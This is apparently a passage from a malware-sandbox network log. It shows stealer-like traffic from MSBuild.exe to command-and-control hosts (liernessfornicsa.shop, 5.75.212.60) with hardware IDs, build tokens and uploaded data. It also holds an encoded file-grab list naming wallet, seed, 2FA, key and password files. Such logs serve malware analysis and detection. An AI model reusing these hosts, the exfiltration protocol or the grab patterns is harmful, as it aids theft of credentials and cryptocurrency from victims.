2024-07-26 16:56:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:54 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:53 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: liernessfornicsa.shop
2024-07-26 16:56:53 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
2024-07-26 16:56:54 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dsf6b0bvrja7bkcm8rolu7n7tp; expires=Tue, 19-Nov-2024 10:43:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ha9BcbB3eVS055qAVeP1yrjk6OBmx0sH8S4JCyKnU0NbA6vZzU%2B%2BxeOPuPyVhBixrrI6sJ42yuPYtSIGRkoSXRxcNXmWd%2FnutSmz0HTNjoFaQSwB0eo2F3Xdrz%2BVUDls99GSUe09q8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ecf899037cae-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:56:54 UTC	561	IN	Data Raw: 34 64 63 0d 0a 67 47 4d 2f 41 33 30 41 46 42 46 75 4c 50 73 6c 6e 46 73 73 33 37 45 64 64 6d 55 67 30 52 70 4d 4a 6a 6b 43 48 73 77 39 52 71 7a 37 51 55 6b 68 52 7a 51 34 4d 78 31 4a 32 52 2f 6f 4b 56 6d 36 6e 54 38 58 41 51 4c 72 66 43 31 4b 53 6d 63 79 37 6b 73 72 6a 72 6f 46 58 6d 38 4f 5a 54 67 7a 43 31 54 5a 48 38 63 67 44 72 72 66 50 30 78 48 52 62 74 34 4c 55 70 62 59 33 57 6a 54 53 72 50 36 41 39 59 61 78 68 6a 63 48 41 43 51 5a 35 41 2b 54 70 47 73 64 68 77 48 67 67 43 2f 54 67 70 58 42 73 34 50 49 46 59 4d 73 33 4e 41 6b 78 6f 58 33 30 34 61 6b 78 4a 6c 51 65 6d 65 55 32 36 30 33 45 51 41 55 75 35 63 69 52 43 57 6d 5a 30 76 46 51 67 78 4f 67 42 57 32 6f 53 61 6d 52 39 43 45 61 56 52 76 4d 36 44 76 4f 54 65 41 78 48 47 76 4d 72 48 45 64 4b 63 57 Data Ascii: 4dcgGM/A30AFBFuLPslnFss37EddmUg0RpMJjkCHsw9Rqz7QUkhRzQ4Mx1J2R/oKVm6nT8XAQLrfC1KSmcy7ksrjroFXm8OZTgzC1TZH8cgDrrfP0xHRbt4LUpbY3WjTSrP6A9YaxhjcHACQZ5A+TpGsdhwHggC/TgpXBs4PIFYMs3NAkxoX304akxJlQemeU2603EQAUu5ciRCWmZ0vFQgxOgBW2oSamR9CEaVRvM6DvOTeAxHGvMrHEdKcW
2024-07-26 16:56:54 UTC	690	IN	Data Raw: 51 32 68 69 45 57 78 78 5a 55 78 52 31 31 36 2b 50 6b 4c 39 69 7a 38 61 41 6b 32 68 65 54 78 42 56 58 4a 77 71 31 6b 70 7a 65 77 42 57 47 59 53 62 48 42 30 44 30 61 64 52 76 41 31 52 4c 37 58 66 46 52 4a 41 72 52 67 62 68 77 62 55 58 2b 71 57 44 62 4e 37 45 46 43 4c 77 59 69 63 58 39 4d 46 74 6c 4e 2b 44 52 48 74 74 52 33 47 42 56 4a 76 48 73 6e 51 31 31 71 66 36 5a 56 49 73 44 6a 42 6c 68 6d 44 57 78 39 66 67 39 45 6e 77 65 77 65 55 6d 6c 6b 79 64 55 4b 55 47 69 62 68 78 48 53 6e 45 38 73 52 45 39 6a 75 55 4e 48 54 6c 66 61 33 35 38 41 55 4f 54 53 66 73 30 52 37 7a 53 63 68 49 4d 51 37 74 77 4b 6b 4e 62 5a 48 47 68 55 53 54 41 36 67 52 5a 61 78 59 69 4f 44 4d 4c 56 74 6b 66 76 67 6c 44 73 64 68 7a 56 6a 4a 42 76 58 59 70 55 68 74 2f 4d 72 63 66 49 38 4b Data Ascii: Q2hiEWxxZUxR116+PkL9iz8aAk2heTxBVXJwq1kpzewBWGYSbHB0D0adRvA1RL7XfFRJArRgbhwbUX+qWDbN7EFCLwYicX9MFtlN+DRHttR3GBVJvHsnQ11qf6ZVIsDjBlhmDWx9fg9EnweweUmlkydUKUGibhxHSnE8sRE9juUNHTlfa358AUOTSfs0R7zSchIMQ7twKkNbZHGhUSTA6gRZaxYiODMLVtkfvglDsdhzVjJBvXYpUht/MrcfI8K
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 33 64 34 34 0d 0a 62 33 6c 36 42 55 65 4c 54 66 49 33 58 4c 44 5a 65 68 6f 4c 52 37 78 34 4c 30 56 56 61 6e 66 75 45 57 54 4a 2b 6b 45 46 49 54 42 76 5a 6d 45 47 52 59 67 46 79 7a 70 41 73 39 52 70 56 42 67 4d 71 6a 67 70 53 42 73 34 50 4b 56 5a 4b 4d 4c 69 42 30 39 76 45 48 42 38 59 51 68 41 6e 55 76 77 4d 45 4f 79 31 6d 30 51 42 31 43 79 66 53 6c 4b 56 6e 4a 35 37 68 46 6b 79 66 70 42 42 53 45 6c 56 6e 46 6a 48 55 6e 62 63 76 30 33 51 4c 72 46 50 77 74 4a 57 2f 4e 2f 49 67 51 44 49 48 2b 69 55 69 33 4c 37 52 4e 58 62 52 35 77 63 58 6f 46 52 4a 68 4a 38 54 4a 43 75 4d 46 30 47 77 39 4e 73 6e 55 6a 54 31 39 67 50 4f 41 66 49 39 61 69 57 52 31 41 45 6d 31 6b 63 42 30 4d 72 45 54 77 4e 30 6d 72 6b 32 42 61 48 67 4b 30 64 47 34 63 47 32 46 77 6f 6c 34 72 79 Data Ascii: 3d44b3l6BUeLTfI3XLDZehoLR7x4L0VVanfuEWTJ+kEFITBvZmEGRYgFyzpAs9RpVBgMqjgpSBs4PKVZKMLiB09vEHB8YQhAnUvwMEOy1m0QB1CyfSlKVnJ57hFkyfpBBSElVnFjHUnbcv03QLrFPwtJW/N/IgQDIH+iUi3L7RNXbR5wcXoFRJhJ8TJCuMF0Gw9NsnUjT19gPOAfI9aiWR1AEm1kcB0MrETwN0mrk2BaHgK0dG4cG2Fwol4ry
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 71 46 47 5a 79 63 77 46 46 6c 30 6e 33 4e 55 61 78 31 47 30 5a 41 6b 71 35 63 53 74 49 56 6d 4e 75 72 56 35 6b 67 4b 49 47 52 53 46 48 49 6c 46 41 4f 32 33 5a 57 4c 41 67 44 72 72 66 50 30 78 48 51 37 74 2f 49 45 42 4a 62 6d 36 67 57 43 54 49 36 67 6c 61 62 52 46 73 5a 48 73 4e 54 70 64 49 39 6a 42 4b 76 4e 64 37 47 41 41 43 2f 54 67 70 58 42 73 34 50 49 5a 63 50 74 53 67 4c 31 5a 68 47 48 4a 67 61 45 78 52 31 31 36 2b 50 6b 4c 39 69 7a 38 51 44 45 69 36 65 79 64 41 56 6d 42 31 6f 56 59 73 77 2b 6f 54 58 47 73 4e 5a 6e 4e 79 41 30 53 64 54 2f 49 32 51 72 6e 42 64 46 52 4a 41 72 52 67 62 68 77 62 51 48 65 34 66 44 62 63 6f 68 34 54 65 46 39 6c 65 6a 4e 55 44 70 42 4c 2f 7a 68 45 75 39 68 36 47 51 64 48 75 58 38 69 52 46 74 6a 65 71 68 53 4c 4d 62 75 44 56 Data Ascii: qFGZycwFFl0n3NUax1G0ZAkq5cStIVmNurV5kgKIGRSFHIlFAO23ZWLAgDrrfP0xHQ7t/IEBJbm6gWCTI6glabRFsZHsNTpdI9jBKvNd7GAAC/TgpXBs4PIZcPtSgL1ZhGHJgaExR116+PkL9iz8QDEi6eydAVmB1oVYsw+oTXGsNZnNyA0SdT/I2QrnBdFRJArRgbhwbQHe4fDbcoh4TeF9lejNUDpBL/zhEu9h6GQdHuX8iRFtjeqhSLMbuDV
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 66 6e 67 4b 51 4a 68 42 38 6a 51 4f 38 35 4e 34 44 45 63 61 38 31 38 30 53 56 31 33 62 5a 74 59 4a 4a 2b 69 48 68 4e 34 58 32 56 36 4d 31 51 4f 6c 45 76 30 4e 45 75 35 32 33 67 58 42 6b 36 33 64 53 4e 41 55 6d 52 35 76 45 30 69 77 4f 49 4f 55 32 34 54 63 48 68 32 44 45 4c 5a 43 62 34 2b 56 76 32 4c 50 79 55 51 51 76 4e 6e 59 46 30 62 5a 33 44 75 42 32 54 42 37 78 4e 52 62 68 39 6a 64 58 63 48 53 5a 39 42 2f 7a 70 4c 76 74 5a 35 46 51 64 4f 75 58 38 6d 54 6c 56 74 65 71 70 5a 49 6f 36 73 51 56 70 35 58 7a 6f 32 51 51 46 41 6b 45 54 34 4e 46 69 56 34 6a 38 4c 53 56 76 7a 66 79 49 45 41 79 42 34 70 56 63 6f 79 2b 6f 45 58 47 6b 56 61 6e 6c 38 48 6b 2b 57 54 76 6b 79 51 37 4c 64 65 68 6f 56 52 62 68 7a 4a 6b 31 56 5a 6a 7a 67 48 79 50 57 6f 6c 6b 64 56 78 78 Data Ascii: fngKQJhB8jQO85N4DEca8180SV13bZtYJJ+iHhN4X2V6M1QOlEv0NEu523gXBk63dSNAUmR5vE0iwOIOU24TcHh2DELZCb4+Vv2LPyUQQvNnYF0bZ3DuB2TB7xNRbh9jdXcHSZ9B/zpLvtZ5FQdOuX8mTlVteqpZIo6sQVp5Xzo2QQFAkET4NFiV4j8LSVvzfyIEAyB4pVcoy+oEXGkVanl8Hk+WTvkyQ7LdehoVRbhzJk1VZjzgHyPWolkdVxx
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 45 71 58 56 66 38 32 44 76 4f 54 65 41 78 48 47 76 4e 4a 4f 45 4e 63 62 7a 36 48 57 44 2f 50 36 41 4a 57 62 56 39 39 4f 47 70 4d 53 5a 55 48 70 6e 6c 44 73 64 35 37 42 67 74 43 73 33 45 70 54 6b 6c 76 63 36 4e 63 4a 4d 76 77 41 45 39 75 46 47 64 31 64 77 4e 42 6c 55 2f 30 65 51 44 39 31 47 64 55 58 77 4b 66 65 7a 39 4f 47 55 64 6d 75 46 67 6f 33 2b 6b 4d 55 53 45 41 4c 47 38 7a 43 30 4c 5a 48 37 34 35 54 37 44 42 65 68 55 4e 53 4c 35 77 49 55 46 65 62 33 69 71 56 43 72 63 37 41 35 64 5a 78 52 6a 63 33 41 48 52 4a 64 4f 37 48 6b 41 2f 64 52 6e 56 46 38 43 6d 57 4d 76 53 56 63 69 55 71 56 4a 49 34 7a 44 44 31 5a 6d 45 33 51 32 62 45 4a 58 32 55 44 79 65 52 62 39 32 6e 45 59 42 45 57 37 63 43 74 45 55 47 42 7a 70 46 45 6a 33 4f 67 4e 56 33 4d 51 59 58 74 33 Data Ascii: EqXVf82DvOTeAxHGvNJOENcbz6HWD/P6AJWbV99OGpMSZUHpnlDsd57BgtCs3EpTklvc6NcJMvwAE9uFGd1dwNBlU/0eQD91GdUXwKfez9OGUdmuFgo3+kMUSEALG8zC0LZH745T7DBehUNSL5wIUFeb3iqVCrc7A5dZxRjc3AHRJdO7HkA/dRnVF8CmWMvSVciUqVJI4zDD1ZmE3Q2bEJX2UDyeRb92nEYBEW7cCtEUGBzpFEj3OgNV3MQYXt3
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 37 7a 4e 30 61 76 30 44 39 61 52 30 57 72 4f 48 59 45 61 57 70 2f 6f 6b 6b 70 77 61 49 65 45 33 68 66 5a 58 6f 7a 56 41 36 4c 56 66 34 79 54 72 72 64 62 52 55 50 54 62 6c 34 4b 45 39 52 59 33 57 71 55 53 33 49 34 77 78 63 59 42 39 6e 64 6e 6f 65 51 39 6b 4a 76 6a 35 57 2f 59 73 2f 49 77 74 4a 67 6e 73 34 42 45 51 75 5a 65 35 59 4b 49 36 36 51 56 78 7a 45 6d 70 79 63 77 46 49 6b 6b 62 2f 4f 6b 36 39 30 48 38 52 44 45 32 31 66 79 4e 4f 55 6d 6c 75 70 6c 73 32 7a 75 34 46 48 53 39 66 5a 57 34 7a 56 41 36 70 52 50 55 31 54 72 44 47 50 77 74 4a 57 2f 4e 2f 49 67 51 44 49 48 53 6c 56 43 4c 46 34 51 4a 54 61 68 56 74 65 58 6b 4b 53 4a 46 43 2f 6a 56 4f 75 4e 56 37 45 41 6c 46 76 58 55 76 56 6c 68 70 50 4f 41 66 49 39 61 69 57 52 31 42 46 48 52 7a 64 42 6f 4d 72 Data Ascii: 7zN0av0D9aR0WrOHYEaWp/okkpwaIeE3hfZXozVA6LVf4yTrrdbRUPTbl4KE9RY3WqUS3I4wxcYB9ndnoeQ9kJvj5W/Ys/IwtJgns4BEQuZe5YKI66QVxzEmpycwFIkkb/Ok690H8RDE21fyNOUmlupls2zu4FHS9fZW4zVA6pRPU1TrDGPwtJW/N/IgQDIHSlVCLF4QJTahVteXkKSJFC/jVOuNV7EAlFvXUvVlhpPOAfI9aiWR1BFHRzdBoMr
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 59 2f 59 73 74 57 6b 64 51 38 79 42 75 41 31 68 79 62 71 68 63 4d 73 32 6c 50 32 4e 42 46 47 35 31 66 77 31 4a 32 51 6d 2b 4e 67 37 6c 36 6a 38 58 46 56 44 38 61 54 68 4a 53 32 63 77 70 6b 34 70 77 71 4a 50 48 53 30 62 61 58 70 32 43 31 37 57 56 65 34 79 51 71 75 66 65 77 5a 48 44 50 4e 70 4a 55 74 4a 62 6e 76 68 54 6a 4c 44 38 67 4a 59 5a 6c 4e 71 5a 33 34 41 44 74 63 48 36 7a 4a 43 75 39 35 71 57 78 5a 55 73 47 34 70 43 46 4e 78 63 61 49 66 47 34 43 69 47 52 30 35 58 31 64 31 66 51 4a 4a 6a 31 61 7a 47 55 57 78 30 48 4d 56 41 41 4c 39 4f 43 67 45 41 7a 4d 79 37 6c 73 31 6a 72 70 52 44 7a 70 4b 4d 53 45 6a 58 6c 48 58 58 72 34 76 44 75 57 42 4d 56 51 56 41 75 73 34 61 55 64 4a 63 6e 71 74 53 53 65 4a 33 44 39 63 62 42 41 75 65 48 67 4d 53 59 6c 52 35 58 Data Ascii: Y/YstWkdQ8yBuA1hybqhcMs2lP2NBFG51fw1J2Qm+Ng7l6j8XFVD8aThJS2cwpk4pwqJPHS0baXp2C17WVe4yQqufewZHDPNpJUtJbnvhTjLD8gJYZlNqZ34ADtcH6zJCu95qWxZUsG4pCFNxcaIfG4CiGR05X1d1fQJJj1azGUWx0HMVAAL9OCgEAzMy7ls1jrpRDzpKMSEjXlHXXr4vDuWBMVQVAus4aUdJcnqtSSeJ3D9cbBAueHgMSYlR5X
2024-07-26 16:56:54 UTC	1369	IN	Data Raw: 64 51 51 4b 54 62 52 47 45 48 4e 4b 5a 32 7a 73 65 53 66 59 34 55 45 54 49 51 63 69 4c 6a 4d 74 52 49 6c 4b 38 54 34 4f 6f 70 31 6d 56 42 45 43 36 79 74 67 42 45 6b 67 4a 4f 34 59 4b 73 50 6a 41 6c 4e 69 44 58 42 77 63 42 70 4e 33 6e 6e 41 48 45 4f 77 31 6e 45 54 4f 58 79 53 63 6a 35 4a 56 47 63 2b 6a 6c 67 79 7a 64 77 2f 61 6e 41 59 63 6a 52 56 44 31 69 61 42 37 42 35 56 76 32 4c 50 7a 55 4e 55 72 35 33 4b 51 5a 37 5a 32 71 74 48 7a 75 41 2b 30 46 4c 49 55 63 78 4f 44 4d 65 44 73 45 48 75 54 70 63 72 39 56 38 41 67 51 46 6a 55 59 44 56 6c 78 77 66 2b 78 75 4b 63 72 30 46 46 35 78 47 46 78 49 58 68 35 4a 69 55 53 38 43 46 69 2b 30 33 45 54 52 77 7a 7a 59 47 34 63 47 30 31 75 71 55 38 6e 6a 76 31 50 52 43 45 4a 49 69 34 67 51 67 36 4c 42 36 5a 35 43 62 50 Data Ascii: dQQKTbRGEHNKZ2zseSfY4UETIQciLjMtRIlK8T4Oop1mVBEC6ytgBEkgJO4YKsPjAlNiDXBwcBpN3nnAHEOw1nETOXyScj5JVGc+jlgyzdw/anAYcjRVD1iaB7B5Vv2LPzUNUr53KQZ7Z2qtHzuA+0FLIUcxODMeDsEHuTpcr9V8AgQFjUYDVlxwf+xuKcr0FF5xGFxIXh5JiUS8CFi+03ETRwzzYG4cG01uqU8njv1PRCEJIi4gQg6LB6Z5CbP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	5.75.212.60	443	7280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:54 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 457 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:56:54 UTC	457	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 36 34 31 64 35 33 64 63 65 63 31 61 62 66 30 63 66 36 62 64 32 66 36 62 63 36 31 37 34 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 30 38 33 37 62 31 64 34 35 61 61 37 66 30 65 63 66 32 64 66 35 35 32 61 37 63 61 38 33 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="token"5a641d53dcec1abf0cf6bd2f6bc6174d------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build_id"b0837b1d45aa7f0ecf2df552a7ca832a------CAEHDBAAECBFHJKFCFBFCont
2024-07-26 16:56:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:56:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:56:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:54 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: liernessfornicsa.shop
2024-07-26 16:56:54 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DFB5F24A2FB8EC7D2F66DB6A27CAC21--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-07-26 16:56:54 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-07-26 16:56:55 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nrbelp5i3bfiepqal68d696shc; expires=Tue, 19-Nov-2024 10:43:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81DKwyaki9GNLB0CQljTRJHzDHgKl%2Bzh0YLi4iXbXOttlWunfJBaslj13Z9Q2oIaWYgxEHGhhloft5sC5vFg%2ByudZK4A%2Bh2WpXWVIKyhRLAslKe7KBeGe%2FVyJKlaZ10gFpUhILvZZ9A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ecff6b0d4400-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:56:55 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-26 16:56:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:56:55 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: liernessfornicsa.shop
2024-07-26 16:56:55 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6DFB5F24A2FB8EC7D2F66DB6A27CAC21--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-07-26 16:56:56 UTC	812	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:56:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fmqflc83i3g3ke7kvs6562alli; expires=Tue, 19-Nov-2024 10:43:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92aBV973rEg2qBtJQXE40CSmwx7AN%2B7sG1dQIULcXFO9RXojZgWp4H82RkQ0%2F9%2FXTqOqPjcpOiyLrkatMZ04%2FZXXJrls8fT1v1tcyF66OUyO24Gq%2FxHZhotCzYLclJVLpvS9izOf%2BLg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ed05dfbdc33c-EWR alt-svc: h3=":443"; ma=86400
